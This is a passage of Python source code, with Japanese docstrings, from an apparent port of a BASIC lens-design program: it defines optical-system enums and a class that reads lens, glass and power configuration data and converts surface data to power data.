interval'\n FIRST_LAST = 'first and last powers'\n\n\nclass PTLCSpecification(Enum):\n NONE = 'none'\n FRONT = 'front'\n BACK = 'back'\n FRONT_OVER_BACK = 'front/back'\n BACK_OVER_FRONT = 'back/front'\n\n\nclass ScreenDisplayDimension(Enum):\n XYPLANE_COORDINATES = 'XY-plane and ray passing point coordinates'\n XYPLANE_3D = 'XY-plane and 3D'\n XYPLANE_XZPLANE = 'XY-plane and XZ-plane'\n SPLIT = 'split view'\n\n\nclass KindOfLens(Enum):\n SINGLE_LENS = 'single lens'\n COMBINED_LENS_FRONT = 'combined lens front'\n COMBINED_LENS_BACK = 'combined lens back'\n IRIS = 'iris'\n LS_REFLECTOR = 'light source reflector'\n REFLECTOR = 'reflector'\n APERTURE = 'aperture'\n LIGHT_SOURCE = 'light source'\n\n\nclass ProgramOperation(Enum):\n END = 1\n NEW = 2\n READ = 3\n COPY = 4\n\n\nclass ProgramFunction(Enum):\n REFLECTOR_DISTRIBUTION = 8\n REFLECTOR_AVERAGE = 9\n\n\nclass Direction(Enum):\n FORWARD = 1\n BACKWARD = -1\n\n\nclass OpticalSystem():\n def __init__(self, config):\n self.start_dt = datetime.now()\n\n self.read_and_check_data(config)\n\n self.prepare_lens_eff_rad(config)\n self.prepare_ptlc(config)\n self.prepare_axis_and_asph(config)\n self.prepare_glass_and_rindex(config)\n\n if self.input_dtype == InputDataType.SURFACE:\n self.process_surf(config)\n elif self.input_dtype == InputDataType.POWER:\n self.process_pow(config)\n elif self.input_dtype == InputDataType.POWER_LIGHT:\n self.process_pow_lit(config)\n elif self.input_dtype == InputDataType.GROUP:\n self.process_grp(config)\n\n self.determine_vals()\n\n self.determine_kind_of_lens()\n\n self.set_obj_dist()\n\n self.calculate_inv()\n\n self.adjust_lens_pos()\n\n def read_and_check_data(self, config):\n \"\"\"\n configで指定されたデータファイルから、光学系のデータを読み込む\n 対応するBASICコード:*IN1 など\n \"\"\"\n self.projection = Projection(\n config.get('Parameters', 'projection', fallback='spot'))\n self.telephoto = Telephoto(\n config.get('System', 'telephoto', fallback='false'))\n self.reflector = Reflector(\n config.get('System', 'reflector', fallback='false'))\n self.scale = config.getfloat('System', 'scale', fallback=100)\n self.input_dtype = InputDataType(\n config.get('System', 'input data type', fallback='surface data'))\n self.tracing_no = TracingNumber(\n config.get('System', 'tracing number', fallback='single'))\n self.inr_adj = IntervalAdjustment(\n config.get('System', 'interval adjustment', fallback='none'))\n self.obj_dist_spc = ObjectDistance(\n config.get(\n 'Parameters',\n 'object distance spcification',\n fallback='to infinity'))\n self.incident_lit_range = IncidentLightRange(\n config.get(\n 'Parameters',\n 'incident light range definition',\n fallback='by system and light source'))\n self.tracing_dir = TracingDirection(\n config.get(\n 'Parameters',\n 'tracing direction',\n fallback='screen to aperture'))\n\n self.system_name = config.get('System', 'system name', fallback='')\n self.no_pows = config.getint('System', 'number of powers', fallback=0)\n self.no_surfs = config.getint(\n 'System', 'number of surfaces', fallback=0)\n self.no_lenses = config.getint(\n 'System', 'number of lenses', fallback=0)\n self.no_grps = config.getint(\n 'System', 'number of groups', fallback=self.no_pows)\n self.adj_pow_inr = config.getint(\n 'System', 'adjusting power interval number', fallback=0)\n self.adj_surf_inr = config.getint(\n 'System', 'adjusting surface interval number', fallback=0)\n self.adj_surf_inr_b = config.getint(\n 'System', 'adjusting interval number behind', fallback=0)\n self.focal_pos = config.getfloat(\n 'System', 'focal position', fallback=0) / self.scale\n self.focal_len = config.getfloat(\n 'System', 'focal length', fallback=0) / self.scale\n self.iris_pos = config.getfloat(\n 'System', 'iris position', fallback=0) / self.scale\n self.fixed_lens_pos = config.getfloat(\n 'System', 'fixed lens position', fallback=0) / self.scale\n self.ap_rad = config.getfloat(\n 'System', 'aperture radius', fallback=0) / self.scale\n self.ls_rad = config.getfloat(\n 'System', 'light source radius', fallback=0) / self.scale\n self.obj_dist_real = config.getfloat(\n 'System', 'object distance', fallback=0) / self.scale\n self.ap_to_ls = config.getfloat(\n 'System', 'aperture to light source', fallback=0) / self.scale\n self.mirror_to_valve = config.getfloat(\n 'System', 'mirror to valve', fallback=0) / self.scale\n\n self.tel_no_pows = config.getint(\n 'Telephoto', 'number of powers', fallback=0)\n self.tel_no_surfs = config.getint(\n 'Telephoto', 'number of surfaces', fallback=0)\n self.tel_system_pos = config.getfloat(\n 'Telephoto', 'system position', fallback=0) / self.scale\n self.tel_system_dist = config.getfloat(\n 'Telephoto', 'distance between systems', fallback=0) / self.scale\n self.tel_focal_len = config.getfloat(\n 'Telephoto', 'focal length', fallback=0) / self.scale\n self.tel_prin_pos_obj = config.getfloat(\n 'Telephoto', 'principal position of object side',\n fallback=0) / self.scale + self.tel_system_dist\n self.tel_prin_pos_prj = config.getfloat(\n 'Telephoto', 'principal position of projection side',\n fallback=0) / self.scale + self.tel_system_dist\n self.tel_ap_disp = config.getfloat(\n 'Telephoto', 'aperture for display', fallback=0) / self.scale\n self.tel_ri_prj = config.getfloat(\n 'Telephoto', 'refractive index of projection region', fallback=0)\n self.tel_adj_inr = config.getint(\n 'Telephoto', 'adjusting interval number', fallback=0)\n self.ls_file = config.get(\n 'Light Source', 'light source file', fallback='')\n self.ls_diff_rad = config.getfloat(\n 'Light Source', 'diffusion radius', fallback=0) / self.scale\n self.ls_no_filamets = config.getint(\n 'Light Source', 'number of filaments', fallback=0)\n self.ls_filament_pos = config.getfloat(\n 'Light Source', 'filament position', fallback=0) / self.scale\n self.ls_filament_len = config.getint(\n 'Light Source', 'filament length', fallback=0) / self.scale\n self.ls_no_segments = config.getint(\n 'Light Source', 'number of aperture segments', fallback=0)\n self.ls_angle_range = config.getfloat(\n 'Light Source', 'angle range', fallback=0) / self.scale\n self.ls_no_rays = config.getint(\n 'Light Source', 'number of tracing rays', fallback=0)\n self.ls_iris_no = config.getint(\n 'Light Source', 'iris surface number', fallback=0)\n self.ls_limit_no = config.getint(\n 'Light Source', 'limit surface number', fallback=0)\n \"\"\"\n リストを初期化する\n 対応するBASICコード:*IN4\n \"\"\"\n global GLASS_DATA\n no_rindex = self.no_surfs + 4 if (\n self.telephoto == Telephoto.TRUE) else self.no_surfs + 2\n self.surfs_of_pow = [0] * (self.no_pows + 1)\n self.lens_rad = [0] * (self.no_lenses + 1)\n self.surf_inr_of_pow = [0] * (self.no_surfs + 1)\n self.div_ratio = [0] * self.no_pows\n self.split_param1 = [0] * self.no_grps\n self.split_param2 = [0] * self.no_grps\n self.lens_eff_rad = [0] * (self.no_lenses * 2 + 4)\n self.ptlc_spc = [PTLCSpecification.NONE] * (self.no_lenses + 1)\n self.ptlc_val = [0] * (self.no_lenses + 1)\n self.axis_ratio = [0] * (self.no_surfs + 1)\n self.asph_coeff = [[]] * self.no_surfs\n self.glass = [GLASS_DATA['AIR']] * (self.no_surfs + 1)\n self.direction = [Direction.FORWARD] * (self.no_surfs + 1)\n self.dispersion = [GLASS_DATA['AIR']['dispersion']] * (\n self.no_surfs + 1)\n self.rindex_sgd = [GLASS_DATA['AIR']['nd']] * (self.no_surfs + 1)\n self.rindex = [GLASS_DATA['AIR']['nd']] * no_rindex\n self.rindex_diff = [0] * no_rindex\n self.surf_inr = [0] * (self.no_surfs + 2)\n self.surf_roc = [0] * (self.no_surfs + 1)\n self.pow_inr = [0] * (self.no_pows + 2)\n self.pow_val = [0] * (self.no_pows + 2)\n self.grp_inr = [0] * (self.no_grps + 1)\n self.lit_hgt_at_pow = [0] * (self.no_pows + 2)\n self.lit_hgt_at_grp = [0] * (self.no_grps + 1)\n self.split_pattern = [SplitPattern.NONE] * self.no_grps\n self.lens_index = [0] * (self.no_surfs + 1)\n self.surf_eff_rad = [0] * (self.no_surfs + 1)\n self.kind_of_lens = [KindOfLens.SINGLE_LENS] * (self.no_lenses + 2)\n \"\"\"\n リスト形式のデータを読み込む\n 対応するBASICコード:*IN6\n \"\"\"\n surfs_of_pow = get_intlist(config, 'System', 'surfaces of powers')\n lens_rad = get_floatlist(config, 'System', 'lens radius')\n surf_inr_of_pow = get_floatlist(config, 'System',\n 'surface intervals of powers')\n div_ratio = get_floatlist(config, 'System',\n 'division ratios of powers')\n split_param1 = get_floatlist(config, 'System',\n 'split parameters first')\n split_param2 = get_floatlist(config, 'System',\n 'split parameters second')\n\n self.surfs_of_pow = overwrite(self.surfs_of_pow, surfs_of_pow)\n self.lens_rad = overwrite(self.lens_rad, lens_rad)\n self.surf_inr_of_pow = overwrite(self.surf_inr_of_pow, surf_inr_of_pow)\n self.div_ratio = overwrite(self.div_ratio, div_ratio)\n self.split_param1 = overwrite(self.split_param1, split_param1)\n self.split_param2 = overwrite(self.split_param2, split_param2)\n\n self.obj_dist_lst = get_floatlist(config, 'System',\n 'object distance list')\n self.dist_index = 0\n \"\"\"\n データの整合性を確認する\n \"\"\"\n if (self.telephoto == Telephoto.FALSE and\n self.inr_adj == IntervalAdjustment.TELEPHOTO_POWER_0):\n raise DataConsistenceError(\n '[System: telephoto] is \"false\"' +\n ' though [System: interval adjustment] is' +\n ' \"telephoto system power set to 0\".')\n\n if (surfs_of_pow and self.input_dtype == InputDataType.SURFACE and\n self.inr_adj == IntervalAdjustment.NONE):\n raise DataConsistenceError(\n '[System: surface intervals of powers] is not void' +\n ' though [System: input data type] is' +\n ' \"surface\" and [System: interval adjustment] is \"none\".')\n\n if (not self.obj_dist_lst and\n self.inr_adj == IntervalAdjustment.FOCAL_POSITION_SEPARATED):\n raise DataConsistenceError(\n '[System: object distance list] is void'\n ' though [System: interval adjustment] is' +\n ' \"specify focal position of separated system\".')\n\n def prepare_lens_eff_rad(self, config):\n \"\"\"\n configで指定されたデータファイルのlens effective radiusの項目を展開して\n lens_eff_radリストを構成する\n 対応するBASICコード:*IN6\n \"\"\"\n lens_eff_rad_data = get_floatlist(config, 'System',\n 'lens effective radius')\n lens_eff_rad_dict = {\n i: {\n 'front': j,\n 'back': k\n }\n for i, j, k in zip(* [iter(lens_eff_rad_data)] * 3)\n }\n lens_eff_rad = []\n for lens_no in range(self.no_lenses):\n if lens_no not in lens_eff_rad_dict:\n lens_eff_rad.append(self.lens_rad[lens_no])\n lens_eff_rad.append(self.lens_rad[lens_no])\n else:\n if (0 < lens_eff_rad_dict[lens_no]['front'] and\n lens_eff_rad_dict[lens_no]['front'] <\n self.lens_rad[lens_no]):\n lens_eff_rad.append(lens_eff_rad_dict[lens_no]['front'])\n else:\n lens_eff_rad.append(self.lens_rad[lens_no])\n if (0 < lens_eff_rad_dict[lens_no]['back'] and\n lens_eff_rad_dict[lens_no]['back'] <\n self.lens_rad[lens_no]):\n lens_eff_rad.append(lens_eff_rad_dict[lens_no]['back'])\n else:\n lens_eff_rad.append(self.lens_rad[lens_no])\n self.lens_eff_rad = overwrite(self.lens_eff_rad, lens_eff_rad)\n\n def prepare_ptlc(self, config):\n \"\"\"\n configで指定されたデータファイルのpower to lens curvature specificationsの項目を展開して\n ptlc_spcリストとptlc_valリストを構成する\n 対応するBASICコード:*IN6\n \"\"\"\n ptlc_spc = [\n PTLCSpecification(e)\n for e in get_stringlist(config, 'System',\n 'power to lens curvature specifications')\n ]\n ptlc_val = get_floatlist(config, 'System', 'power to lens values')\n self.ptlc_spc = overwrite(self.ptlc_spc, ptlc_spc)\n self.ptlc_val = overwrite(self.ptlc_val, ptlc_val)\n\n def prepare_axis_and_asph(self, config):\n \"\"\"\n configで指定されたデータファイルのsurfaces axis length ratiosと\n surfaces aspheric coefficientsの項目を読み込み、\n axis_ratioリストとasph_coeffリストを構成する\n 対応するBASICコード:*IN6\n \"\"\"\n surf_axis_data = get_floatlist(config, 'System',\n 'surface axis length ratios')\n surf_axis_dict = dict(zip(* [iter(surf_axis_data)] * 2))\n surf_asph_data = get_floatlist(config, 'System',\n 'surfaces aspheric coefficients')\n axis_ratio = []\n asph_coeff = []\n asph_no = 0\n for surf_no in range(self.no_surfs):\n if surf_no not in surf_axis_dict:\n axis_ratio.append(1)\n asph_coeff.append([])\n else:\n axis_ratio.append(surf_axis_dict[surf_no])\n if surf_axis_dict[surf_no] >= 0:\n asph_coeff.append([])\n else:\n asph_coeff_element = []\n for index in range(4):\n asph_coeff_element.append(\n surf_asph_data[asph_no * 4 + index] *\n (self.scale / 100)**(index * 2 + 1))\n asph_coeff.append(asph_coeff_element)\n asph_no += 1\n self.axis_ratio = overwrite(self.axis_ratio, axis_ratio)\n self.asph_coeff = overwrite(self.asph_coeff, asph_coeff)\n\n def prepare_glass_and_rindex(self, config):\n \"\"\"\n 予め用意されたGLASS_DATAおよび\n configで指定されたデータファイルのglass type namesの項目をもとに\n 光学系を定める以下の各リストを構成する\n glass, direction, dispersion, rindex, rindex_sgd, rindex_diff\n 対応するBASICコード:*IN6\n \"\"\"\n global GLASS_DATA\n v_dr = 1\n v_b = 0\n glass = []\n direction = []\n dispersion = []\n rindex = []\n rindex_sgd = []\n rindex_diff = []\n for glass_name in get_stringlist(config, 'System', 'glass type names'):\n glass_name = 'AIR' if glass_name == '' else glass_name\n if glass_name == 'REF':\n v_dr = -v_dr\n if glass_name not in GLASS_DATA:\n raise NoGlassDataError(glass_name +\n ' is not found in GLASS_DATA')\n glass.append(GLASS_DATA[glass_name])\n direction.append(Direction(v_dr))\n dispersion.append(GLASS_DATA[glass_name]['dispersion'])\n rindex.append(GLASS_DATA[glass_name]['nd'])\n v_q = v_dr * GLASS_DATA[glass_name]['nd']\n rindex_sgd.append(v_q)\n if v_b != 0:\n rindex_diff.append(v_q - v_b)\n v_b = v_q\n self.glass = overwrite(self.glass, glass)\n self.direction = overwrite(self.direction, direction)\n self.dispersion = overwrite(self.dispersion, dispersion)\n self.rindex_sgd = overwrite(self.rindex_sgd, rindex_sgd)\n self.rindex = overwrite(self.rindex, rindex)\n self.rindex_diff = overwrite(self.rindex_diff, rindex_diff)\n self.rindex_sgd_0 = self.rindex_sgd[0]\n self.rindex_sgd_end = self.rindex_sgd[self.no_surfs]\n self.rindex_sgd_prj = self.rindex_sgd_end\n self.focal_len_index = self.rindex_sgd_prj * rev(self.focal_len)\n\n def process_surf(self, config):\n \"\"\"\n configで指定されたデータファイルのsurface dataの項目から\n surf_inrリストとsurf_rocリストを読み込む\n 対応するBASICコード:*IN6, *IN4\n \"\"\"\n surf_data = get_floatlist(config, 'System', 'surface data')\n self.surf_inr = overwrite(self.surf_inr, surf_data[::2])\n self.surf_roc = overwrite(self.surf_roc, surf_data[1::2])\n\n def process_pow(self, config):\n \"\"\"\n configで指定されたデータファイルのpower dataの項目から\n pow_inrリストとpow_valリストを読み込む\n 対応するBASICコード:*IN6, *IN4\n \"\"\"\n pow_data = get_floatlist(config, 'System', 'power data')\n self.pow_inr = overwrite(self.pow_inr, pow_data[::2])\n self.pow_val = overwrite(self.pow_val, pow_data[1::2])\n self.pow_inr_0 = self.pow_inr[0]\n\n def process_pow_lit(self, config):\n \"\"\"\n configで指定されたデータファイルのpower and light dataの項目から\n lit_hgt_at_powリストとpow_inrリストを読み込み、\n pow_valリストの値を計算する\n 対応するBASICコード:*IN6, *IN4, *EF2\n \"\"\"\n pow_lit_data = get_floatlist(config, 'System', 'power and light data')\n self.lit_hgt_at_pow = overwrite(self.lit_hgt_at_pow, pow_lit_data[::2])\n self.pow_inr = overwrite(self.pow_inr, pow_lit_data[1::2])\n surf_no = 0\n pow_val = []\n for pow_no in range(self.no_pows):\n if (self.rindex_diff[surf_no] == 0 and\n self.surfs_of_pow[pow_no] == 1 or\n self.pow_inr[pow_no] == 0):\n pow_val.append(0)\n else:\n pow_val.append(\n ((self.lit_hgt_at_pow[pow_no +\n 1] - self.lit_hgt_at_pow[pow_no + 2]\n ) * rev(self.pow_inr[pow_no + 1]) -\n (self.lit_hgt_at_pow[pow_no] - self.\n lit_hgt_at_pow[pow_no + 1]) * rev(self.pow_inr[pow_no]))\n / self.lit_hgt_at_pow[pow_no + 1])\n surf_no += self.surfs_of_pow[pow_no]\n self.pow_val = overwrite(self.pow_val, pow_val)\n self.pow_inr_0 = self.pow_inr[0]\n\n def process_grp(self, config):\n \"\"\"\n configで指定されたデータファイルのgroup dataの項目から\n lit_hgt_at_grpリストとgrp_inrリストを読み込み、\n split patternsの項目から\n split_patternリストを読み込む。\n grp_valリストとpow_inrリストとpow_valリストを計算する\n 対応するBASICコード:*IN6, *EF3\n \"\"\"\n grp_data = get_floatlist(config, 'System', 'group data')\n self.lit_hgt_at_grp = overwrite(self.lit_hgt_at_grp, grp_data[::2])\n self.grp_inr = overwrite(self.grp_inr, grp_data[1::2])\n split_pattern = [\n SplitPattern(e)\n for e in get_stringlist(config, 'System', 'split patterns')\n ]\n self.split_pattern = overwrite(self.split_pattern, split_pattern)\n\n # lit_hgt_at_grpおよびgrp_inrからgrp_valを計算\n surf_no = 0\n pow_no = 0\n grp_val = []\n for grp_no in range(self.no_grps):\n if (self.split_pattern[grp_no] == SplitPattern.NONE and\n self.rindex_diff[surf_no] == 0 and\n self.surfs_of_pow[pow_no] == 1 or self.grp_inr == 0):\n grp_val.append(0)\n else:\n grp_val.append(\n ((self.lit_hgt_at_grp[grp_no +\n 1] - self.lit_hgt_at_grp[grp_no + 2]\n ) * rev(self.grp_inr[grp_no + 1]) -\n (self.lit_hgt_at_grp[grp_no] - self.\n lit_hgt_at_grp[grp_no + 1]) * rev(self.grp_inr[grp_no]))\n / self.lit_hgt_at_grp[grp_no + 1])\n pow_no += 1\n surf_no += self.surfs_of_pow[pow_no]\n if self.split_pattern[grp_no] != SplitPattern.NONE:\n pow_no += 1\n surf_no += self.surfs_of_pow[pow_no]\n self.grp_val = overwrite(self.grp_val, grp_val)\n\n # grp_inrおよびgrp_valからpow_inrとpow_valへ変換\n pow_no = 0\n delta = 0\n pow_inr = []\n pow_val = []\n for grp_no in range(self.no_grps):\n if self.split_pattern[grp_no] == SplitPattern.NONE:\n pow_inr.append(self.grp_inr[grp_no] - delta)\n pow_val.append(self.grp_val[grp_no])\n delta = 0\n pow_no += 1\n else:\n v_u = self.split_param1[grp_no]\n v_v = self.split_param2[grp_no]\n v_f = self.grp_val[grp_no]\n v_g = self.grp_inr[grp_no]\n if self.split_pattern[grp_no] == SplitPattern.FIRST_INTERVAL:\n pow_inr.append(v_g - v_v * (v_f - v_u) /\n (1 - v_u * v_v) / v_f - delta)\n pow_val.append(v_u)\n pow_inr.append(v_v)\n pow_val.append((v_f - v_u) / (1 - v_u * v_v))\n elif self.split_pattern[grp_no] == SplitPattern.LAST_INTERVAL:\n pow_inr.append(v_g - (v_u * v_v) / v_f - delta)\n pow_val.append((v_f - v_u) / (1 - v_u * v_v))\n pow_inr.append(v_v)\n pow_val.append(v_u)\n elif self.split_pattern[grp_no] == SplitPattern.RATIO_INTERVAL:\n pow_inr.append(v_g - v_v * v_u / v_f * fn_p(v_u, v_f, v_v)\n - delta)\n pow_val.append(fn_p(v_u, v_f, v_v))\n pow_inr.append(v_v)\n pow_val.append(v_u * fn_p(v_u, v_f, v_v))\n elif self.split_pattern[grp_no] == SplitPattern.FIRST_LAST:\n pow_inr.append(v_g - (v_u + v_v - v_f) / v_v - delta)\n pow_val.append(v_u)\n pow_inr.append((v_u + v_v - v_f) / v_u / v_v)\n pow_val.append(v_v)\n delta = pow_val[pow_no] * pow_inr[pow_no + 1] / v_f\n pow_no += 2\n self.pow_inr = overwrite(self.pow_inr, pow_inr)\n self.pow_val = overwrite(self.pow_val, pow_val)\n self.pow_inr_0 = self.pow_inr[0]\n\n def determine_vals(self):\n \"\"\"\n lens_eff_radからhole_valueを\n lens_radとap_radからmax_radを\n それぞれ決定する\n 対応するBASICコード:*IN6\n \"\"\"\n hole_value_pv = self.lens_eff_rad[self.no_lenses * 2 - 1]\n if (self.tracing_dir == TracingDirection.SCREEN_TO_APERTURE_EXT and\n hole_value_pv < self.lens_rad[self.no_lenses - 1]):\n self.hole_value = hole_value_pv**2\n else:\n self.hole_value = 0\n self.max_rad = max(self.lens_rad + [self.ap_rad])\n\n def determine_kind_of_lens(self):\n \"\"\"\n 光学系の構成要素の種類を順に決定し、kind_of_lensリストに格納する\n 対応するBASICコード:*DRV\n \"\"\"\n lens_index = []\n surf_eff_rad = []\n kind_of_lens = []\n surf_no = 0\n lens_no = 0\n for pow_no in range(self.no_pows):\n if self.adj_surf_inr == 0 and self.adj_pow_inr == pow_no:\n self.adj_surf_inr = surf_no\n if self.adj_pow_inr == 0 and self.adj_surf_inr == surf_no:\n self.adj_pow_inr = pow_no\n no_surfs = self.surfs_of_pow[pow_no]\n for surf in range(no_surfs):\n lens_index.append(lens_no)\n if self.is_air(surf_no + surf) and self.is_air(\n surf_no + surf + 1):\n if (self.direction[surf_no + surf].value ==\n -self.direction[surf_no + surf + 1].value):\n kind_of_lens.append(KindOfLens.REFLECTOR)\n elif (lens_no == self.no_lenses - 1 and self.tracing_dir ==\n TracingDirection.SCREEN_TO_APERTURE_EXT) or (\n surf_no + surf == 0 and self.surf_inr[0] < 0 and\n (self.tracing_dir == TracingDirection.\n SOURCE_TO_APERTURE or self.tracing_dir ==\n TracingDirection.SOURCE_TO_APERTURE_EXT)):\n kind_of_lens.append(KindOfLens.LS_REFLECTOR)\n else:\n kind_of_lens.append(KindOfLens.IRIS)\n self.surf_roc[surf_no + surf] = 0\n self.axis_ratio[surf_no + surf] = 1\n surf_eff_rad.append(self.lens_eff_rad[lens_no * 2])\n lens_no += 1\n elif self.is_air(surf_no +\n surf) and not self.is_air(surf_no + surf + 1):\n kind_of_lens.append(KindOfLens.SINGLE_LENS)\n surf_eff_rad.append(self.lens_eff_rad[lens_no * 2])\n lens_no += 1\n elif not self.is_air(surf_no + surf) and not self.is_air(\n surf_no + surf + 1):\n kind_of_lens[-1] = KindOfLens.COMBINED_LENS_FRONT\n kind_of_lens.append(KindOfLens.COMBINED_LENS_BACK)\n surf_eff_rad.append(\n min(self.lens_eff_rad[lens_no * 2 - 1],\n self.lens_eff_rad[lens_no * 2]))\n lens_no += 1\n else:\n surf_eff_rad.append(self.lens_eff_rad[lens_no * 2 - 1])\n if (no_surfs == 1 or\n (no_surfs == 2 and self.rindex[surf_no + 1] == 1) or\n (no_surfs == 3 and\n self.rindex_diff[surf_no] * self.rindex_diff[surf_no +\n 2] == 0)):\n self.div_ratio[pow_no] = 0\n surf_no = surf_no + no_surfs\n if surf_no != self.no_surfs or lens_no != self.no_lenses:\n raise DataConsistenceError(\n \"Number of surfaces/lenses doesn't match.\")\n if self.tracing_dir == TracingDirection.SCREEN_TO_APERTURE_EXT:\n kind_of_lens.append(KindOfLens.APERTURE)\n elif (self.tracing_dir == TracingDirection.SOURCE_TO_APERTURE or\n self.tracing_dir == TracingDirection.SOURCE_TO_APERTURE_EXT):\n kind_of_lens.append(KindOfLens.LIGHT_SOURCE)\n kind_of_lens.append(KindOfLens.APERTURE)\n self.lens_index = overwrite(self.lens_index, lens_index)\n self.surf_eff_rad = overwrite(self.surf_eff_rad, surf_eff_rad)\n self.kind_of_lens = overwrite(self.kind_of_lens, kind_of_lens)\n self.surf_inr_0 = self.surf_inr[0]\n self.surf_eff_rad_0 = self.surf_eff_rad[0]\n\n def set_obj_dist(self):\n \"\"\"\n 計算対象の物体距離等を設定する\n 対応するBASICコード:*LSET\n \"\"\"\n if self.inr_adj == IntervalAdjustment.FOCAL_POSITION_SEPARATED:\n self.obj_dist_real = self.obj_dist_lst[self.dist_index]\n if (self.input_dtype != InputDataType.SURFACE and\n self.input_dtype != InputDataType.POWER or\n self.inr_adj != IntervalAdjustment.NONE) and (\n self.obj_dist_spc == ObjectDistance.INFINITY or\n self.obj_dist_spc == ObjectDistance.FIRST_POWER):\n self.obj_dist = self.pow_inr_0 * self.rindex_sgd_0\n else:\n self.obj_dist = self.obj_dist_real / self.scale\n\n def calculate_inv(self):\n \"\"\"\n 収差の計算に用いる逆行列を算出する\n 対応するBASICコード:*IN5\n \"\"\"\n CAL_POINTS = [.4, .6, .8, 1, 1.05],\n CAL_POINTS_EQUAL_AREA = [.020, .316, .548, .707, .837, .949, 1]\n\n self.inv = {}\n tmp = []\n for index in range(4, 17, 2):\n tmp.append(sum([e**index for e in CAL_POINTS]))\n self.inv['even'] = np.linalg.inv(\n np.matrix([[tmp[i + j] for i in range(3)] for j in range(3)]))\n tmp = []\n for index in range(2, 11):\n tmp.append(sum([e**index for e in CAL_POINTS[::-1] + CAL_POINTS]))\n self.inv['odd'] = np.linalg.inv(\n np.matrix([[tmp[i + j] for i in range(4)] for j in range(4)]))\n tmp = []\n for index in range(4, 17, 2):\n tmp.append(sum([e**index for e in CAL_POINTS_EQUAL_AREA]))\n self.inv['equal_area'] = np.linalg.inv(\n np.matrix([[tmp[i + j] for i in range(3)] for j in range(3)]))\n\n def convert_surf_to_pow(self):\n \"\"\"\n 屈折面データから、パワーデータへの変換を行う\n 対応するBASICコード:*EFG\n \"\"\"\n pow_inr = []\n pow_val = []\n surf_inr_of_pow = []\n div_ratio = []\n surf_no = 0\n pow_inr_pv = self.pow_inr[0]\n for pow_no in range(self.no_pows):\n v_a = 0\n v_y = 1\n v_w = 0\n v_e_lst = []\n v_f_lst = []\n no_surfs = self.surfs_of_pow[pow_no]\n for surf in range(no_surfs):\n surf_inr_of_pow.append(self.surf_inr[surf_no + surf])\n v_e = self.surf_inr[surf_no + surf] / self.rindex_sgd[surf_no +\n surf]\n v_w = v_w + v_e / (v_y - v_e * v_a) / v_y\n v_y = v_y - v_e * v_a\n v_f = self.rindex_diff[surf_no + surf] * rev(\n self.surf_roc[surf_no + surf])\n v_a = v_a + v_y * v_f\n v_e_lst.append(v_e)\n v_f_lst.append(v_f)\n lens_no = self.lens_index[surf_no + surf]\n if (self.direction[surf_no + surf].value ==\n -self.direction[surf_no + surf + 1].value):\n self.ptlc_val[lens_no] = self.surf_roc[surf_no + surf]\n elif not self.is_air(surf_no + surf + 1):\n if self.ptlc_spc[lens_no] == PTLCSpecification.FRONT:\n self.ptlc_val[lens_no] = self.surf_roc[surf_no + surf]\n elif self.ptlc_spc[lens_no] == PTLCSpecification.BACK:\n self.ptlc_val[lens_no] = self.surf_roc[surf_no +\n surf + 1]\n elif (self.ptlc_spc[lens_no] ==\n PTLCSpecification.FRONT_OVER_BACK or\n self.ptlc_spc[lens_no] ==\n PTLCSpecification.BACK_OVER_FRONT):\n if abs(self.surf_roc[surf_no + surf + 1]) < abs(\n self.surf_roc[surf_no + surf]):\n self.ptlc_spc[\n lens_no] = PTLCSpecification.BACK_OVER_FRONT\n self.ptlc_val[lens_no] = (self.surf_roc[\n surf_no +\n surf + 1] * rev(self.surf_roc[surf_no + surf]))\n else:\n self.ptlc_spc[\n lens_no] = PTLCSpecification.FRONT_OVER_BACK\n self.ptlc_val[lens_no] = (self.surf_roc[\n surf_no +\n surf] * rev(self.surf_roc[surf_no + surf + 1]))\n elif self.is_air(surf_no + surf):\n self.ptlc_val[lens_no] = 0\n pow_val.append(v_a)\n v_a = rev(v_a)\n pow_inr.append(pow_inr_pv + (1 - 1 / v_y) * v_a + v_w)\n pow_inr_pv = (1 - v_y) * v_a\n if no_surfs == 2 and self.is_air(surf_no + 1):\n div_ratio.append(v_f_lst[1] / v_f_lst[0])\n elif no_surfs == 3:\n if self.is_air(surf_no + 1):\n div_ratio.append((v_f_lst[1] + v_f_lst[2] -\n v_e_lst[2] * v_f_lst[1] * v_f_lst[2]) *\n rev(v_f_lst[0]))\n elif self.is_air(surf_no + 2):\n div_ratio.append(v_f_lst[2] /\n (v_f_lst[0] + v_f_lst[1] -\n v_e_lst[1] * v_f_lst[0] * v_f_lst[1]))\n else:\n self.ptlc_val[self.lens_index[surf_no + 2] -\n 2] = self.surf_roc[surf_no + 1]\n if (self.direction[surf_no +\n 1].value == self.direction[surf_no +\n 2].value):\n div_ratio.append(\n -((self.rindex_sgd[surf_no +\n 2] - self.direction[surf_no + 1]\n .value) * rev(self.surf_roc[surf_no + 1]) *\n (1 - v_e_lst[2] * v_f_lst[2]) + v_f_lst[2]) /\n ((self.rindex_sgd[surf_no +\n 1] - self.direction[surf_no + 1].\n value) * rev(self.surf_roc[surf_no + 1]) *\n (1 - v_e_lst[1] * v_f_lst[0]) + v_f_lst[0]))\n else:\n div_ratio.append(\n -(self.rindex_sgd[surf_no + 2] * rev(\n self.surf_roc[surf_no + 1]) *\n (1 - v_e_lst[2] * v_f_lst[2]) + v_f_lst[3]) /\n (self.rindex_sgd[surf_no + 1] * rev(\n self.surf_roc[surf_no + 1]) *\n (1 - v_e_lst[1] * v_f_lst[0]) + v_f_lst[0]))\n elif no_surfs == 4:\n div_ratio.append((v_f_lst[2] + v_f_lst[3] -\n v_e_lst[3] * v_f_lst[2] * v_f_lst[3]) /\n (v_f_lst[0] + v_f_lst[1] -\n v_e_lst[1] * v_f_lst[0] * v_f_lst[1]))\n else:\n div_ratio.append(0)\n surf_no += no_surfs\n pow_inr.append(pow_inr_pv)\n\n self.pow_inr = overwrite(self.pow_inr, pow_inr)\n self.pow_val = overwrite(self.pow_val, pow_val)\n self.surf_inr_of_pow = overwrite(self.surf_inr_of_pow, surf_inr_of_pow)\n self.div_ratio = overwrite(self.div_ratio, div_ratio)\n\n if (self.obj_dist_spc == ObjectDistance.FIRST_POWER or\n self.obj_dist_spc == ObjectDistance.INFINITY and\n self.input_dtype != InputDataType.SURFACE and\n self.inr_adj != IntervalAdjustment.NONE):\n self.surf_inr[0] = (self.pow_inr_0 - self.pow_inr[0]\n ) * self.rindex_sgd[0] + self.surf_inr_0\n self.pow_inr[0] = self.pow_inr_0\n else:\n self.pow_inr_0 = self.pow_inr[0]\n\n def convert_pow_to_surf(self):\n \"\"\"\n パワーデータから、屈折面データへの変換を行う\n 対応するBASICコード:*DRG\n \"\"\"\n surf_no = 0\n cal_delta = False\n v_u_lst = []\n v_f_lst = [0, 0, 